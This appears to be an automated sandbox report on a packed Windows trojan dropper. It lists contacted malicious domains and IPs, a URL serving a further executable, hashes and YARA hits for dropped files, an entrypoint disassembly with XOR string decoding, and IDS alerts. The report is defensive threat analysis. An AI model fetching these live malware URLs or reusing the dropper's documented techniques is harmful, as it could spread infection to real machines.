http://cavwousmoau.st/	olfopeh-outix.exe, 00000001.00000003.502362915.00000000001AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://utbidet-ugeas.biz/d/N?025C9DA2735C9DA2736D9D8E735C9D3E4BD5B3EBEA5D9D62DB5E99945D6EB39B416CAD8	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02CCB3E1F2CCB3E1F2FDB3CDF2CCB37DCA459DA86BCDB3215ACEB7D7DCFE9DD8C0FC83C	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?022E11CAC92E11CAC91F11E6C92E1156F1A73F83502F110A612C15FCE71C3FF3FB1E21E	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://lpzegvpcu.nu/sproxy.dll	olfopeh-outix.exe, 00000001.00000003.555431793.00000000001AB000.00000004.00000020.00020000.00000000.sdmp, olfopeh-outix.exe, 00000001.00000003.557040145.00000000001AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://utbidet-ugeas.biz/d/N?020A8DA1850A8DA1853B8D8D850A8D3DBD83A3E81C0B8D612D088997AB38A398B73ABD8	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02B6E63A40B6E63A4087E61640B6E6A6783FC873D9B7E6FAE8B4E20C6E84C8037286D61	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?0259DEF0B359DEF0B368DEDCB359DE6C8BD0F0B92A58DE301B5BDAC69D6BF0C98169EED	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02083A3281083A3281393A1E81083AAEB981147B18093AF2290A3E04AF3A140BB3380A1	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?0270CC764670CC764641CC5A4670CCEA7EF9E23FDF71CCB6EE72C8406842E24F7440FC5	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://69.50.173.166/gdnOT2424.exe	KJEfMLiuRS.exe, KJEfMLiuRS.exe, 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, olfopeh-outix.exe, olfopeh-outix.exe, 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: malware	unknown
http://ssgykumyk.st/	olfopeh-outix.exe, 00000001.00000003.570399854.00000000001AB000.00000004.00000020.00020000.00000000.sdmp, olfopeh-outix.exe, 00000001.00000003.559140236.00000000001AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://utbidet-ugeas.biz/d/N?02AC7D265AAC7D265A9D7D0A5AAC7DBA6225536FC3AD7DE6F2AE7910749E531F689C4D0	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
88.198.29.97	skffvor.vg	Germany	24940	HETZNER-ASDE	false
167.99.35.88	utbidet-ugeas.biz	United States	14061	DIGITALOCEAN-ASNUS	true
64.70.19.203	wbhotxso.ws	United States	3561	CENTURYLINK-LEGACY-SAVVISUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	763718
Start date and time:	2022-12-08 20:21:08 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	KJEfMLiuRS.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/6@232/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 8.7% (good quality ratio 8.7%) Quality average: 75.5% Quality standard deviation: 14.1%
HCA Information:	Successful, ratio: 99% Number of executed functions: 31 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:22:38	API Interceptor	113x Sleep call for process: olfopeh-outix.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
167.99.35.88	tLIQS3Pca5.exe	Get hash	malicious	Browse	pxrxqntc.info/
	CgFJBVFNlg.exe	Get hash	malicious	Browse	asqckezz.info/
	I3OoGcJSG1.exe	Get hash	malicious	Browse	przvgke.biz/ktlc
	7ABA21BD10B88275B4620021ABC90E8D0E5F8F0316E8D.exe	Get hash	malicious	Browse	przvgke.biz/a
	expiro2.exe	Get hash	malicious	Browse	przvgke.biz/eqctcvjjoitgv
64.70.19.203	BbbEtaIxAU.exe	Get hash	malicious	Browse	issasname.ws/xyz/abc/order.php?id=5889637
	GxELazkKkG.exe	Get hash	malicious	Browse	enahmnhqah.ws/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk
	Readme.exe	Get hash	malicious	Browse	ersaenrnwh.ws/imgs/krewa/nqxa.php?id=50f5gzcu&s5=3159&lip=192.168.2.5&win=Unk
	EAfIchN1gN.exe	Get hash	malicious	Browse	ehmpeseeaa.ws/imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk
	144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Get hash	malicious	Browse	xircus.ws/kin/logout.php
	Br6Pmt0MiZ.exe	Get hash	malicious	Browse	thaus.ws/6
	R5JbUb3muW.exe	Get hash	malicious	Browse	thaus.ws/6
	kmHFEwF36g.exe	Get hash	malicious	Browse	thaus.ws/1
	VkTXaNHTs6.exe	Get hash	malicious	Browse	eaffuebudbeudbbk.ws/6
	wNtMSZRvzI.exe	Get hash	malicious	Browse	eafuebdbedbedggk.ws/4
	y7ddF1vGqA.exe	Get hash	malicious	Browse	deauduafzgezzfgk.ws/3
	6FRRo6QFF2.exe	Get hash	malicious	Browse	wduufbaueeubffgu.ws/5
	Photo-149-101.jpg.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	winsvcs.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	Photo-137-158.jpg.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	9v7gUCpZOr.exe	Get hash	malicious	Browse	eaffuebudbeudbbu.ws/2
	1rP65UzlyY.exe	Get hash	malicious	Browse	eaffuebudbeudbbu.ws/5
	JAGk3xeQ5I.exe	Get hash	malicious	Browse	geueudusl.ws/vnc/2
	SecuriteInfo.com.Trojan.Siggen10.14421.6375.exe	Get hash	malicious	Browse	fheuhdwdzwgzdggu.ws/2
	SecuriteInfo.com.Trojan.Siggen10.14421.24699.exe	Get hash	malicious	Browse	wduufbaueeubffgr.ws/2

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	fg.exe	Get hash	malicious	Browse	195.201.57.90
	file.exe	Get hash	malicious	Browse	95.216.221.253
	setup.exe	Get hash	malicious	Browse	95.217.25.31
	Unl#U0443m_Ve_rssi#U043en.exe	Get hash	malicious	Browse	95.217.25.31
	Unl#U0443m_Ve_rssi#U043en.exe	Get hash	malicious	Browse	95.217.25.31
	SetupLauncher..exe	Get hash	malicious	Browse	95.217.25.31
	Setup.exe	Get hash	malicious	Browse	95.217.25.31
	SetupLauncher..exe	Get hash	malicious	Browse	95.217.25.31
	vFsYU3btg0.exe	Get hash	malicious	Browse	95.217.25.31
	p3Q6mW75v7.exe	Get hash	malicious	Browse	94.130.179.90
	6rowFGzE63.exe	Get hash	malicious	Browse	95.217.25.31
	file.exe	Get hash	malicious	Browse	148.251.234.83
	file.exe	Get hash	malicious	Browse	95.216.221.253
	file.exe	Get hash	malicious	Browse	95.216.205.133
	6VushxrtvY.exe	Get hash	malicious	Browse	94.130.179.90
	irQJVScEpr.exe	Get hash	malicious	Browse	95.217.124.110
	c8#Ub2e4.exe	Get hash	malicious	Browse	116.202.6.206
	c8#Ub2e4.exe	Get hash	malicious	Browse	116.202.6.206
	prog.apk	Get hash	malicious	Browse	144.76.58.8
	prog.apk	Get hash	malicious	Browse	144.76.58.8

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\ogvubeak-omooc.dll

Download File

Process:	C:\Windows\SysWOW64\olfopeh-outix.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.986860765323523
Encrypted:	false
SSDEEP:	384:v/7uFc9Ru3OAjpxEtDlW+rLZWPhgdimRcVVKJmb6bteBMpwHejgmRkcUO5:v/a8Ru+1W+rLZWucmaDKJmeteBMRkmKQ
MD5:	013B26C602717EC3FE325ED9319830FF
SHA1:	4200CC9C1FA4D89CA2436C9F457A17FDE59A869C
SHA-256:	37E4F396388F943ED7E586828F159845DC13DABAB8DA6145D56548CE74EDD2A2
SHA-512:	AB3B5EB56A49704EDD20D84C62A2BAEFC219451E0929B8DBC12B0BC5DAEC809C1B49D99AE962B6754BE73694B05B857D0457058761499FCDDAC4C14DB9979CD5
Malicious:	true
Yara Hits:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: C:\Users\user\AppData\Roaming\ogvubeak-omooc.dll, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 80%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..E...........#...8.:... .......>.......P......................................@>........ .........................,.......t....................................................................................................................text....9.......:.................. ..`.data...@....P.......>..............@....bss.........p...........................edata..,............R..............@..@.idata..t............T..............@....reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\tmp1D9F.tmp

Download File

Process:	C:\Windows\SysWOW64\olfopeh-outix.exe
File Type:	data
Category:	dropped
Size (bytes):	90812
Entropy (8bit):	5.468855722634771
Encrypted:	false
SSDEEP:	768:E2flzTehLuYNBdqqULBRr6BPFatnS5G6MqIZiNAUqX7h+XtZguCPXwOKGHyh1dwX:E2hWpBdpgyBPYtira7hsIGPlXP8
MD5:	8B827385D3E569D77DCC0AEF97E80386
SHA1:	2C33D9AE845B94F9EEB65A794A62A2FC2F67F94B
SHA-256:	AB32C6E28B6F8FE5A6C021494CB3F3E912DF511B27FDB98CF33BF37A33272BE4
SHA-512:	7435F9A966A674EA19DDBC6A56EFC818112748D16E811E3B8278314D858DA758B1CDD5A9F557FCE226CDD301D461BCC32B70B376B7817B88C9EF78EF327604E1
Malicious:	true
Yara Hits:	Rule: SUSP_Two_Byte_XOR_PE_And_MZ, Description: Look for 2 byte xor of a PE starting at offset 0, Source: C:\Users\user\AppData\Roaming\tmp1D9F.tmp, Author: Wesley Shields <wxs@atarininja.org> Rule: SUSP_Four_Byte_XOR_PE_And_MZ, Description: Look for 4 byte xor of a PE starting at offset 0, Source: C:\Users\user\AppData\Roaming\tmp1D9F.tmp, Author: Wesley Shields <wxs@atarininja.org> Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: C:\Users\user\AppData\Roaming\tmp1D9F.tmp, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	BU......................O..................................................C..[gf\|/.}`h}nb/lnaa`{/mj/}za/fa/K@\/b`kj!...+......._J..C....>.J...............7.............<.......o....O.........................................../.................................k...................................................................................................................Z_W?....................................Z_W>.............{..................O...Z_W=.........o.......G..............O...!fb.`}{\|.............E..............O...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\atgusoon-odeas.exe

Download File

Process:	C:\Windows\SysWOW64\olfopeh-outix.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92960
Entropy (8bit):	5.52420426407781
Encrypted:	false
SSDEEP:	1536:sKJwQtUPzJmJIBX8h0W9C6aFNzT2qWgQJcnEhfOYvSjkw9RI/r563lWXWTumhs8K:RJwQWJmJIBX0X9C6aFNzT2qWgQJcnEhf
MD5:	6E1BA1DB1452D173C24EB0B7FDA18047
SHA1:	E72CAB45A51372CA5E3EAAFF40AB7B1CF3D23D63
SHA-256:	29767D0448E6A2FB1516597DE668AA1F32C00DC20220C971DBFC0F41A192AF4C
SHA-512:	24F4D80CA9439ABB4B90D928C6571B4AD6BCC6378CBD5BA9019A5DC195CD6305DBDBAC130ACAF52A901BB83A5A15C4B1D8D9ED1084357B7DDBCC7380FC713EF0
Malicious:	true
Yara Hits:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: C:\Windows\SysWOW64\atgusoon-odeas.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.E...............8............&.............@..........................0......9G........ .............................. .......................................................................................................................text............................... ..`.idata....... ......................@.....................................................................................U...@.WVS..t....L$d..&.@.s....B4..A......t$dVj.j......h......$h...Sj.....j.j.j.j.j.h....S..........u........l...j.j.j.P....j..l$.UjdVS....S.....T$e..$....9.s...D$d0.B..T$..D$X9.s....B...D$.P.D$.Pj.j.j.j.j.j.j...$....P.u...........j.j.j.j.j.h......$\|...P........................j......j.+D$mPS.....j.U.t$m.t$qj..(...P.2...P..S.....S..........D$e9.s...D$d0...B.D$e9...h.....\|$mW.....W.....j.h....j.j.j.h...@W.x.......t7...t2j.U.t$mVP.....S.....

C:\Windows\SysWOW64\ivtahook-eaceab.dll

Download File

Process:	C:\Windows\SysWOW64\olfopeh-outix.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	3.2054333412539835
Encrypted:	false
SSDEEP:	48:6sz+I0qeE/6JbPXvJFR7YEpk1Kcxc2GZJOFl:H/bvkLfzREEC1KAD
MD5:	C8521A5FDD1C9387D536F599D850B195
SHA1:	A543080665107B7E32BCC1ED19DBFBC1D2931356
SHA-256:	FA8F77B6DAF775D66DE9D27C1D896168A792057358E518C00E72B8964B966CA5
SHA-512:	541500E2CD502852A007D29BADC1A1848D187245F78EC272281BAB290CC6E308F0AE6D1B96863E0C30A176B16C6CF7E63E08A8DE81A84615E4710E7164A805CD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......E...........#...8..................... ...............................`......._........ ......................0..+....@...............................P..D....................................................................................text...`........................... ..`.data...`.... ......................@....edata..+....0......................@..@.idata.......@......................@....reloc..D....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\olfopeh-outix.exe

Download File

Process:	C:\Users\user\Desktop\KJEfMLiuRS.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	90812
Entropy (8bit):	5.468855722634772
Encrypted:	false
SSDEEP:	768:IOg167GTCGTL9tCqwhX52pwTu5gV62i9wb4CWYLyAKfPXvByNGOLDd5FBEewj4Wy:s0Y9WV32pau5gV62++Kf/vw/d5Un4h
MD5:	BFFE00256D8E388757322C0788A1876C
SHA1:	0E188DBAEF105E3CD2857A174BC7FDF132694592
SHA-256:	28A62AA42E262869A2EB41ABCF288D8D555F2154234E33F62A738069878CAD09
SHA-512:	AC5C8DBA5A507C726382905254816A0D6450504109A23BB2A3E7A312116EFDEB862CC71C3824D610D9B4D32A1FEC01375B42D68681288F140CCF7BC3AE0A0C2C
Malicious:	true
Yara Hits:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: C:\Windows\SysWOW64\olfopeh-outix.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1.E...............8.............3.......`....@........................................... ..............................p..d...................................................................................................................UPX0....................................UPX1.............t..................@...UPX2.........`.......H..............@....imports.....p.......J..............@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\ubboonook.exe

Download File

Process:	C:\Windows\SysWOW64\olfopeh-outix.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	93984
Entropy (8bit):	5.540081217913105
Encrypted:	false
SSDEEP:	1536:hrmqM5Hm5+CAUQ5NOkgbKgfBSCsDOtmddT2sz+:FmqM5g/oCsRJ6
MD5:	4DB2309C458F16BFC4893A5C89FC8ED1
SHA1:	EB9C0251BE916FCEF98AEF58EAEF349255D0EF94
SHA-256:	31FC2B439CB534889D8583E6109D0F469975915A14DD6D92CEFC909C180BCCD5
SHA-512:	5DF03CD9C641C4838A487CED164A6F3078C3CC62E6DEC3D280B24D3DC9C61D221F896991A78B22263194785D66791E98C02FBFEFA3C08ABC39C439AECE7E1193
Malicious:	true
Yara Hits:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: C:\Windows\SysWOW64\ubboonook.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.E...............8............&.............@..........................0............... .............................. .......................................................................................................................text...0........................... ..`.idata....... ......................@................................................................................................UWVS.........@..D$......t$..8.<$Vj@.l$.U.\$.Sj.......3.H.f.G...V.t$.USj......t$..t$.j.......$.......@...&.@.s....B4...A.......$....Pj.j..*....5...f.8"..u.......f..t.f.."u....f..t....f.. u.\$.S......D$.PSj.j.j.j.j.j.Vj......h......$....Sj......j.j.j.j.j.h....S........................j.j.j.P.....j.Ujd..$....PS.....S.......$......$....9.s....$....0.B..\$lS......D$.PSj.j.j.j.j.j.j...$....P.............j.j.j.j.j.h......$....P.X...................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Entropy (8bit):	5.468855722634772
TrID:	Win32 Executable (generic) a (10002005/4) 99.37% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	KJEfMLiuRS.exe
File size:	90812
MD5:	bffe00256d8e388757322c0788a1876c
SHA1:	0e188dbaef105e3cd2857a174bc7fdf132694592
SHA256:	28a62aa42e262869a2eb41abcf288d8d555f2154234e33f62a738069878cad09
SHA512:	ac5c8dba5a507c726382905254816a0d6450504109a23bb2a3e7a312116efdeb862cc71c3824d610d9b4d32a1fec01375b42d68681288f140ccf7bc3ae0a0c2c
SSDEEP:	768:IOg167GTCGTL9tCqwhX52pwTu5gV62i9wb4CWYLyAKfPXvByNGOLDd5FBEewj4Wy:s0Y9WV32pau5gV62++Kf/vw/d5Un4h
TLSH:	8D937D5BB9B37571D98502B200A3C3769C69BE352E2F25F1E3451631E706B68BF0C62E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1.E...............8.............3.......`....@........................................... ............................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4033eb
Entrypoint Section:	UPX0
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x45B531DA [Mon Jan 22 21:51:22 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c1246ca9ec291149221a5cbc329bf1a2

Entrypoint Preview

Instruction
push ebp
mov eax, 00001678h
push edi
push esi
push ebx
call 00007FE3ECA4D0ECh
mov dword ptr [esp+2Ch], 00000000h
mov dword ptr [esp+28h], 00000000h
mov dword ptr [esp+24h], 00000000h
mov dword ptr [esp+20h], 00000000h
mov dword ptr [esp+0Ch], 00000000h
call 00007FE3ECA4D3DFh
push 004120F0h
mov dword ptr [00412290h], eax
mov dword ptr [004120F0h], 00000094h
call 00007FE3ECA4D3D6h
mov eax, 004107F3h
cmp eax, 004107F9h
jnc 00007FE3ECA4A8E8h
xor byte ptr [eax], FFFFFFD4h
inc eax
jmp 00007FE3ECA4A8D5h
mov eax, 004107E6h
cmp eax, 004107F2h
jnc 00007FE3ECA4A8E8h
xor byte ptr [eax], FFFFFFD4h
inc eax
jmp 00007FE3ECA4A8D5h
push 004107E6h
call 00007FE3ECA4D368h
cmp dword ptr [00412100h], 02h
mov ebx, eax
je 00007FE3ECA4A909h
mov eax, 004107CFh
cmp eax, 004107E5h
jnc 00007FE3ECA4A8E8h
xor byte ptr [eax], FFFFFFD4h
inc eax
jmp 00007FE3ECA4A8D5h
push 004107CFh
push ebx
call 00007FE3ECA4D390h
test eax, eax
je 00007FE3ECA4A8E8h
push 00000001h
push 00000000h
call eax
push 00000104h
lea eax, dword ptr [esp+0000156Ch]
push eax
push 00000000h
call 00007FE3ECA4D382h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17000	0x64	.imports
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0xd000	0xd000	False	0.4735764723557692	data	6.140220112941354	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0xe000	0x8000	0x7400	False	0.2876481681034483	data	4.293834683488793	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX2	0x16000	0x1000	0x200	False	0.54296875	data	4.027104010290433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.imports	0x17000	0x1000	0x600	False	0.3932291666666667	data	4.07693679281843	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
ADVAPI32.DLL	RegCloseKey, RegCreateKeyA, RegCreateKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, RegSetValueExW
KERNEL32.DLL	CloseHandle, CreateFileA, CreateMutexA, CreateProcessA, CreateThread, CreateToolhelp32Snapshot, DeleteFileA, ExitProcess, ExpandEnvironmentStringsA, GetCommandLineA, GetComputerNameA, GetCurrentProcessId, GetCurrentThreadId, GetFileSize, GetFileTime, GetLastError, GetModuleFileNameA, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetSystemDirectoryA, GetSystemTimeAsFileTime, GetTempFileNameA, GetTempPathA, GetTickCount, GetVersionExA, HeapAlloc, HeapFree, HeapReAlloc, LoadLibraryA, OpenProcess, Process32First, Process32Next, ReadFile, SetFileAttributesA, SetFilePointer, SetFileTime, SetPriorityClass, Sleep, TerminateProcess, VirtualAlloc, WaitForSingleObject, WriteFile, lstrcatA, lstrcmpiA, lstrcpyA, lstrlenA
USER32.dll	ExitWindowsEx, wsprintfA
WS2_32.DLL	WSAGetLastError, WSAStartup, closesocket, connect, gethostbyname, getsockopt, htons, inet_addr, ioctlsocket, recv, select, send, socket

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
167.99.35.88192.168.2.480497392016803 12/08/22-20:23:31.759468	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49739	167.99.35.88	192.168.2.4
192.168.2.48.8.8.859380532012811 12/08/22-20:23:30.267249	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	59380	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480497542016803 12/08/22-20:23:54.488035	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49754	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497572016803 12/08/22-20:24:06.035247	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49757	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497592016803 12/08/22-20:24:07.918298	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49759	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497362016803 12/08/22-20:23:27.166137	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49736	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497532016803 12/08/22-20:23:54.423796	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49753	167.99.35.88	192.168.2.4
192.168.2.48.8.8.850037532016778 12/08/22-20:24:01.204526	UDP	2016778	ET DNS Query to a *.pw domain - Likely Hostile	50037	53	192.168.2.4	8.8.8.8
192.168.2.48.8.8.859423532016778 12/08/22-20:23:35.349617	UDP	2016778	ET DNS Query to a *.pw domain - Likely Hostile	59423	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480497352016803 12/08/22-20:23:27.061037	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49735	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497382016803 12/08/22-20:23:31.700039	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49738	167.99.35.88	192.168.2.4
192.168.2.48.8.8.850157532012811 12/08/22-20:23:53.274454	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	50157	53	192.168.2.4	8.8.8.8
167.99.35.88192.168.2.480497152016803 12/08/22-20:23:06.231949	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49715	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497322016803 12/08/22-20:23:25.464357	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49732	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497332016803 12/08/22-20:23:25.982189	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49733	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480496992016803 12/08/22-20:22:57.921531	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49699	167.99.35.88	192.168.2.4
167.99.35.88192.168.2.480497122016803 12/08/22-20:23:01.084049	TCP	2016803	ET TROJAN Known Sinkhole Response Header	80	49712	167.99.35.88	192.168.2.4
